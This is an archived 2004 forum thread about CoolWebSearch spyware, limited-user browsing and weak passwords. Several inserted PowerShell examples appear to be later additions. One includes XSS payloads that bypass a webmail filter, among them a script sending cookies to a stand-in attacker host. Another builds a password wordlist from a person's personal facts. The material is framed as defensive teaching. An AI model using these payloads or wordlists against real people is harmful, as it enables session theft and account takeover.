
View Full Version : Trojan warning



IronFist
04-12-2004, 11:05 PM
Alright, everyone needs to stay away from anything called CoolWebSearch, or anything with a name close to that, such as coolsearch.biz. It's a trojan/hijacker that bad websites install without telling you. I just spent 2 days trying to get rid of that s.hit, and I think I've finally gotten it. Hopefully. My only loss was that Windows Media Player had to be deleted.

CWS is a pain. There are over 30 varieties of it, and new versions are coming out faster than with any other piece of malware (at least that's what I heard).

Ad-aware doesn't pick it up, and neither does SpyBot, or virus scans.

If you happen to get it, you need to first run CWShredder, which is a program designed to help remove all known versions of it. Some versions of CWS cause CWShredder to shut down, but the latest version of CWShredder can counter that.

Anyway, while looking through my registry and other places, I also found the following trojans:

a.exe
optimize.exe (not optimizer.exe, which is something different)
Bridge

Hopefully I've gotten them all removed.

I also had help from Hijack This.

So, if you ever open IE and your homepage has been replaced by "cool search dot biz" or something like that, just be aware that you're probably in for annoying crap.

Note: I wrote cool search dot biz so it wouldn't appear as a URL, and so no one would click on it.

CWS Chronicles (http://www.spywareinfo.com/%7Emerijn/cwschronicles.html) <-- article about how much CWS sucks (by the author of CWShredder), and also links to CWShredder and other info if you need it.

Good luck.

mickey
04-13-2004, 02:28 AM
IronFist,

I quickly clicked on to this thread because I thought you had some worriesome info on condoms.

mickey

David Jamieson
04-13-2004, 05:06 AM
dude, you gotta stop clicking all over the place like your system is a big click fest!

you need to create some message rules in your email client so you are not getting the spam attachments that send you these malicious programs.

you need to be more wary of free software and the people who manufacture it.

rule of thumb, if it sounds to good to be true, then it is. There is no free lunch.

also, ease off on the porn sites man. get a magazine or something, it's safer. And don't put your email address all over the internet where the bots can harvest it and send you even more spam and malicious code!

cheers

Royal Dragon
04-13-2004, 06:12 AM
My biggest thing is someone keeps hacking into my Netzero account, and sending viruses to people. I've changed the password 3 times in the last 2 weeks, and it still keeps happening.

I contacted Netzero again this morning, we will see what happens.

MasterKiller
04-13-2004, 06:18 AM
KL,
sounds like you have a key logger hidden on your hard drive.

David Jamieson
04-13-2004, 06:30 AM
actually mk, i have never used av software and i don't intend to.

if you know even a little about it, you don't need it.

I am of the opinion that the av comps are the ones who are the worst offenders and proliferators of viruses.

why would they do this? well, to stay in business and keep getting gajillions of dollars off of people who think it's ok to open every dang attachment they get simply because they think it's from some one they know.

people prey on stupid people. That is the number one mark of the marketer. They believe that most people are dumb and frankly they are correct and through their lack of ethics and morals and the entrenchment of capitalist ideals, they don't have a problem with shearing the sheep.

Bottom line is. Be careful. The only safe computer is the one that is totally OFF a network. most people would be completely stunned at how simple the process of hacking is. A little information is a dangerous thing. Knowledge is power and don't think for one minute that someone out there has the goods on you and you gave it to them through your computer and what you keep on it.

lol, suckers, HaX04z 400L J00

WanderingMonk
04-13-2004, 10:27 AM
Originally posted by Kung Lek

Bottom line is. Be careful. The only safe computer is the one that is totally OFF a network. most people would be completely stunned at how simple the process of hacking is.

social engineering works too, so zero network connection does not necessarily ensure safety.

The simple act of opening e-mail can be troublesome these days. avoiding MSIE and its "features" can save you a lot of grief.

http://www.theinquirer.net/?article=14908

Hotmail, Yahoo flummoxed by Filter flaw
Allows the bad guys in

By INQUIRER staff: Wednesday 24 March 2004, 08:10
FILTERS IN Yahoo Mail and Hotmail allow hackers to steal passwords, access mail and generally cause all sorts of naughtiness, it is alleged.

Computer security firm GreyMagic discovered the glitch at the beginning of the month and released an advisory about it yesterday.

According to a GreyMagic rep, Yahoo and Hotmail screen all HTML content as it pours through a pipeline into its servers in a bid to stop damaging scripts scarring the processes.

GreyMagic techies, apparently, have worked out a way to bypass such filters.

The cross-site scripting flaw uses an Achilles' Heel in a site's security to send potentially harmful commands flying around all over the place.

GreyMagic said it had used Internet Explorer "features" to demonstrate the defect.
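The article does not say what GreyMagic's bypass actually was, so the following is an added example, not the article's or GreyMagic's code, showing the general reason such webmail filters fail: a filter that strips a denylist of dangerous markup (the Remove-ScriptTags function here is a stand-in for the kind of filter the article describes, not the real Hotmail or Yahoo code) can be bypassed by any construct it did not anticipate, while encoding the untrusted HTML as text cannot be bypassed that way. The four messages are constructed for the demo; the `expression()` one relies on a real but IE-only CSS feature of that era.

```powershell
# Added example: denylist filtering versus output encoding for untrusted HTML.
# Remove-ScriptTags is a stand-in for a webmail "strip the dangerous bits" filter;
# it is not the real Hotmail/Yahoo filter and the sample messages are constructed.

function Remove-ScriptTags {
    # Denylist filter: drop <script> elements and javascript: URLs, pass the rest.
    param([string]$Html)
    $clean = $Html -replace '(?is)<script\b.*?</script>', ''
    $clean = $clean -replace '(?i)javascript:', ''
    return $clean
}

function ConvertTo-SafeText {
    # The robust alternative: encode the untrusted markup so the browser shows it
    # as text (<  becomes &lt; and so on) instead of interpreting it.
    param([string]$Html)
    return [System.Net.WebUtility]::HtmlEncode($Html)
}

function Test-ContainsActiveContent {
    # Demo-only check: is there still a real tag carrying an inline event handler,
    # a javascript: href, an IE expression() style, or a <script> element?
    param([string]$Html)
    $pattern = '(?i)<[a-z][^>]*\s(on[a-z]+\s*=|href\s*=\s*["'']?\s*javascript:|style\s*=[^>]*\bexpression\s*\()|<script\b'
    return [bool]($Html -match $pattern)
}

# Constructed messages: the first is what the denylist was written for,
# the other three slip past it by not looking like what it expects.
$samples = @(
    '<b>Hi</b><script>document.location="http://evil.example/?c="+document.cookie</script>',
    '<img src="x" onerror="alert(document.cookie)">',           # no <script> tag at all
    '<a href="javasjavascript:cript:alert(1)">click</a>',      # one pass of stripping re-creates "javascript:"
    '<div style="width: expression(alert(1))">IE only</div>'    # IE-specific CSS "feature"
)

foreach ($s in $samples) {
    $filtered = Remove-ScriptTags $s
    $encoded  = ConvertTo-SafeText $s
    "denylist : {0}`n   still active: {1}" -f $filtered, (Test-ContainsActiveContent $filtered)
    "encoded  : {0}`n   still active: {1}" -f $encoded,  (Test-ContainsActiveContent $encoded)
}
```

Run it in any Windows PowerShell session; only the first message comes out of the denylist filter inert, while every encoded message does. The check function is deliberately crude (it is there to make the point visible, not to be a filter itself); the lesson is that the encoding side needs no list of bad things to know about.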

IronFist
04-13-2004, 05:57 PM
Originally posted by Kung Lek
dude, you gotta stop clicking all over the place like your system is a big click fest!

"Click fest" is funny cuz it sounds dirty, but it isn't.

Or is it? :D

:eek:


you need to create some message rules in your email client so you are not getting the spam attachments that send you these malicious programs.

It wasn't from email. It was installed by some stupid website.


you need to be more wary of free software and the people who manufacture it.

Yeah. I didn't install anything that I knew about. It was installed by some website without my knowledge.


rule of thumb, if it sounds to good to be true, then it is. There is no free lunch.

rule of thumb, s.hita.ss websites install things without telling you.


also, ease off on the porn sites man

But! But...

I mean.

Hah. Porn sites? What's that?

I never put my email address on a website. If I do, it's like userXXname@doXXmain.com and then I tell people to remove the X's.

Watahhh
04-13-2004, 07:20 PM
I don't think that AV companies are the ones who write the viruses in the first place. Can you imagine the legal implications of doing something like that? Especially for a major company like Norton or Mcafee. There are enough idiots out there who write viruses to keep them in business for a long time.

AV products don't work that well anyway. I've tried them all so far and none have detected or prevented the dozens of spyware/adware that got installed on my system. They only seem to catch email viruses/trojans, which are easy to avoid anyway. If you're dumb enough to open an attachment with an extension like .exe.pif.scr.vbe then you shouldn't be on the internet in the first place.

Spyware that gets installed on your system by simply viewing a website is the major problem these days. Most common offenders are serial/crack sites and some porn sites. This happens due to security issues in Micro$oft's IE. I've formatted my computer and installed all the patches and now it seems to be ok. Haven't been getting any more spyware lately, but I'm sure those l33t h3x0r$ will come up with something new.

A firewall such as TPF can be a pretty good defense against spyware. Most of the time it won't stop it from being installed but it will alert you when it tries to open a socket for communication over the internet at which point you can deny it access and take the necessary steps to remove it. Firewalls are only as good as the people running them though, and for most they're just a hassle and often get turned off or disabled for convenience. Not much can be done against ignorance.

Another good defence, which I posted in another thread, is to have a separate user account with limited privileges (i.e. not an admin or power user account). With this account you would only have write access to files in the user's My Documents and Shared Files folders. Any virus/trojan/spyware would inherit the same user rights and would not be able to install itself in your system files or registry since it doesn't have access. You could use this account whenever you're using the internet/email/kazaa and login as admin when you're offline to install/manage your system.

I'm not sure how strongly Windows XP enforces this policy but if it's even half decent, it should work. It's the principle behind all *nix distros.

Edit: ****, sorry for long post. i get carried away with these things.

Chang Style Novice
04-13-2004, 07:54 PM
Trojan warning:

The ribs go on the OUTSIDE!

Ask me no questions, just trust me on this one.

Watahhh
04-13-2004, 10:10 PM
Originally posted by Chang Style Novice
The ribs go on the OUTSIDE!

I agree.

Anyway, I've done a bit more research and found out about the runas command which allows you to run an application as any user regardless of who you are logged in as. This has great potential.

You can have your normal Admin account (say: admin) which you always login as and also create a 'Limited' account (say: lim) which HAS a password (do not leave blank).

This way you can login to windows as always and have full access rights with the admin account. However, when you want to surf the net, check mail or start any other potentially unsecure apps, you can use the runas command to start that app with the Limited user account (so that it can't cause any harm to your system).

For example, you're logged in as admin and want to go on the internet to browse for some porn which could be potentially dangerous for reasons other than going blind. What you do is you go to Start->Run and type:

runas /env /u:username iexplore

Replace username with the limited user account (in this case, lim). A DOS shell will popup asking for the password (can't be blank). Type the password, press enter and iexplore comes up. Try navigating to your C:\ drive and deleting some files. You will notice that it won't let you, since the user running iexplore doesn't have access rights. When a trojan/spyware tries to install itself on your system it will have the same problem. You are now VIRUS IMMUNE!

This might be a good solution but it's still a bit of a hassle going through all that. It would be better to create a shortcut which you could simply double click and it would open iexplore in 'safe mode'. Problem with this is that the runas command needs the user to input the password interactively, i.e. you can't pass it as a commandline argument. Hence you would have to enter the password every time you start the app.

Fortunately I found a solution to this. There is an application on the internet called Runas Professional which you can use as a replacement for the builtin runas command.

http://www.mast-computer.com/c_9-l_en.html

Using this application you can create a RAP file with the application path, username and password which when double-clicked will simply run the target app in 'safe mode' as required. Change the icon of the RAP file, place it on your desktop, call it IExplore and you won't be able to tell the difference from before.

You should have a very high level of protection now. Any virus/trojan/whatever will only be able to delete/modify files in the users My Documents and Shared Documents folders. Nothing else.

I have to do a bit more research to find out how application spawned processes behave (i.e. you run IE in 'safe mode', but then you click on Outlook. Is Outlook also running in 'safe mode'?). Also need to find out if there are any loopholes allowing a trojan to bypass the user restrictions imposed on it (maybe running as a 'system' process). If Windows is even half decent, this method would make your computer immune to a lot of viruses. Just make RAP shortcuts for IExplore, Outlook, Kazaa, MSN and whatever. I've only tested this with IExplore so far. Some pre winXP apps might not run properly under a non-admin user. However, IE and Outlook should be safe.
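The limited-account idea from the earlier post and the runas shortcut worked out above, as an added example in PowerShell that is not the poster's own setup and does not use the Runas Professional tool: it creates the password-protected limited user, stores the credential once in a DPAPI-protected file instead of a plaintext RAP file, and launches the browser under that account from a script a desktop shortcut can point at. The account name `lim`, the file paths and the browser path are assumptions; the `New-LocalUser` / `Add-LocalGroupMember` cmdlets need Windows 10 or later with PowerShell 5.1 (they do not exist on the XP-era systems the thread is about), and the one-time setup must run from an elevated admin session.

```powershell
# Added example: least-privilege browsing without typing the password each time.
# Names, paths and the account "lim" are assumptions for the demo.

$LimitedUser = 'lim'
$CredFile    = Join-Path $env:LOCALAPPDATA 'lim-browser.cred.xml'
$Browser     = 'C:\Program Files\Internet Explorer\iexplore.exe'

function New-LimitedBrowserUser {
    # One-time, from an elevated prompt. Member of "Users" only: nothing it
    # launches can write to C:\Windows, Program Files, or HKLM.
    param([string]$Name, [securestring]$Password)
    if (-not (Get-LocalUser -Name $Name -ErrorAction SilentlyContinue)) {
        New-LocalUser -Name $Name -Password $Password -PasswordNeverExpires `
            -Description 'Limited account for browsing and mail' | Out-Null
        Add-LocalGroupMember -Group 'Users' -Member $Name
    }
}

function Save-LimitedCredential {
    # Export-Clixml protects the SecureString with DPAPI under the *admin*
    # profile, so only that Windows account (on this machine) can read it back.
    param([string]$Name, [string]$Path)
    $cred = Get-Credential -UserName "$env:COMPUTERNAME\$Name" -Message "Password for $Name"
    $cred | Export-Clixml -Path $Path
}

function Start-AsLimitedUser {
    # Non-interactive equivalent of "runas /env /u:lim iexplore": the new
    # process gets the limited user's token but inherits this environment.
    param([string]$Program, [string]$Path)
    $cred = Import-Clixml -Path $Path
    Start-Process -FilePath $Program -Credential $cred -WorkingDirectory $env:SystemRoot
}

function Get-ProcessOwner {
    # Sanity check after launch: which account owns the browser process?
    param([string]$ProcessName)
    Get-CimInstance Win32_Process -Filter "Name = '$ProcessName'" |
        ForEach-Object { (Invoke-CimMethod -InputObject $_ -MethodName GetOwner).User }
}

# --- one-time setup (elevated) ---
# New-LimitedBrowserUser -Name $LimitedUser -Password (Read-Host 'New password' -AsSecureString)
# Save-LimitedCredential -Name $LimitedUser -Path $CredFile

# --- what the desktop shortcut runs: powershell.exe -File C:\Tools\browse-limited.ps1 ---
Start-AsLimitedUser -Program $Browser -Path $CredFile
Start-Sleep -Seconds 3
Get-ProcessOwner -ProcessName 'iexplore.exe'
```

Get-ProcessOwner should report the limited account rather than the admin account you are logged in as. On the poster's question about spawned programs: Windows creates a child process with its parent's token, so Outlook, a downloaded installer, or anything else started from that browser runs as the limited user too. Two caveats a practitioner would add: the credential file is readable by anything already running as the admin account, so the protection is against the browser's process, not against code that already has your rights; and a limited token only blocks what the filesystem and registry ACLs block, so a local privilege-escalation bug in Windows itself still defeats it. On XP the same account can be made with `net user lim * /add`, and XP Professional's `runas /savecred` caches the password for a plain shortcut without any third-party tool.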

SevenStar
04-13-2004, 10:40 PM
Originally posted by WanderingMonk


social engineering works too, so zero network connection does not necessarily insure safety.

The simple act of opening e-mail can be troublesome these day. avoiding MSIE and its "features" can save you a lot of griefs.

http://www.theinquirer.net/?article=14908

Hotmail, Yahoo flummoxed by Filter flaw
Allows the bad guys in

By INQUIRER staff: Wednesday 24 March 2004, 08:10
FILTERS IN Yahoo Mail and Hotmail allow hackers to steal passwords, access mail and generally cause all sorts of naughtiness, it is alleged.

Computer security firm GreyMagic discovered the glitch at the beginning of the month and released an advisory about it yesterday.

According to a GreyMagic rep, Yahoo and Hotmail screen all HTML content as it pours through a pipeline into its servers in a bid to stop damaging scripts scarring the processes.

GreyMagic techies, apparently, have worked out a way to bypass such filters.

The cross-site scripting flaw uses an Achilles' Heel in a site's security to send potentially harmful commands flying around all over the place.

GreyMagic said it had used Internet Explorer "features" to demonstrate the defect.

Not only social engineering, but everyday human carelessness. Before moving to web development, I was a network admin... I can't count how many times I saw people's passwords taped onto their desk, PC, etc. people would take papers with passwords on them, not shred them and just toss them in the trash. If you can gain access to an office, chances are, you can get a password.

Also, many common users will create passwords based on things like address, maiden name, pet's name, etc. Things that you can commonly find info about at their desk, in their garbage can, etc. you can start putting together possible password lists merely by snooping around their area and finding out a little about them.

I used to run l0pht crack on a regular basis, just to see how long it took to crack the passwords. It was shocking how weak they were.

lol, when I was in college, there was a guy in a web development class. his final project was to create a website about the topic of his choice - he chose hackers. (his teacher gave him an F because she hated hackers, wtf?) Anyway, I found his site and figured it would be cool to hack a site about hackers. So I got it and changed it up a bit, then sent him an email letting him know to strengthen his password.
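The "possible password lists" built from what is lying around someone's desk, as an added example in PowerShell that is not the poster's code: it takes a handful of personal facts, applies the usual case, digit, year and leetspeak mutations, and checks candidate passwords against the result, which is the same thing an auditor does with a cracker such as L0phtCrack except that here the target is your own users' choices. The facts and the passwords tested are constructed for the demo.

```powershell
# Added example: build a targeted candidate list from personal facts and
# check passwords against it. All facts and test passwords are constructed.

function Get-PasswordCandidates {
    param(
        [string[]]$Facts,                # words gleaned from the desk, trash, photos
        [int[]]$Years = (1950..2004)     # birth years, anniversaries, this year
    )
    $leet = @{ 'a' = '4'; 'e' = '3'; 'i' = '1'; 'o' = '0'; 's' = '$' }
    $set  = [System.Collections.Generic.HashSet[string]]::new()

    foreach ($fact in $Facts) {
        $base = $fact.Trim()
        if (-not $base) { continue }

        # case variants plus a leetspeak form of the lower-case word
        $forms = @(
            $base.ToLower(),
            $base.ToUpper(),
            ($base.Substring(0, 1).ToUpper() + $base.Substring(1).ToLower())
        )
        $l = $base.ToLower()
        foreach ($k in $leet.Keys) { $l = $l.Replace($k, $leet[$k]) }
        $forms += $l

        foreach ($f in $forms) {
            [void]$set.Add($f)
            foreach ($suffix in 0..99)            { [void]$set.Add("$f$suffix") }
            foreach ($suffix in '!', '1!', '123') { [void]$set.Add("$f$suffix") }
            foreach ($y in $Years) {
                [void]$set.Add("$f$y")              # rex1998
                [void]$set.Add("$f$($y % 100)")     # rex98
            }
        }
    }
    return $set
}

function Test-PasswordInCandidates {
    param([string]$Password, [System.Collections.Generic.HashSet[string]]$Candidates)
    return $Candidates.Contains($Password)
}

# Constructed facts for one fictional user: dog's name, street, daughter, team.
$facts      = 'rex', 'maple', 'jessica', 'cowboys'
$candidates = Get-PasswordCandidates -Facts $facts
"{0} candidates from {1} facts" -f $candidates.Count, $facts.Count

# Constructed passwords: three that a snooper would get, one that isn't derivable.
foreach ($pw in 'Rex1998', 'c0wb0y$', 'Maple!', 'Tq7#vL9p2x') {
    "{0,-12} in list: {1}" -f $pw, (Test-PasswordInCandidates -Password $pw -Candidates $candidates)
}
```

A few thousand candidates from four facts is a trivial run for any cracker, which is the point: the passwords people build from their own surroundings are weak not because they are short but because the search space is tiny once the facts are known. To audit a real environment, feed the generated list to the cracker as a wordlist rather than comparing plaintext as this demo does.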

Shaolinlueb
04-14-2004, 04:46 AM
Originally posted by Royal Dragon
My biggest thing is someone keeps hacking into my Netzero account, and sending viruses to people. I've changed the password 3 times in the last 2 weeks, and it still keeps hapening.

I contacted Netzero again this morning, we will see what happenes.

you don't need a password to send out emails from an account. I can write a program that sends from your account without logging into it.

Royal Dragon
04-14-2004, 05:34 AM
Really??

How do I keep these goons from doing this then?

David Jamieson
04-14-2004, 06:20 AM
How do I keep these goons from doing this then?

a) find them a girlfriend

b) introduce them to a little place called "outside"

c) nothing

Shaolinlueb
04-14-2004, 08:05 AM
Originally posted by Kung Lek


a) find them a girlfriend

b) introduce them to a little place called "outside"

c) nothing


d.) tell them their N30hax4j00 is a stupid name and show them how to get a real life. or just sign them up for Queer eye for the straight guy.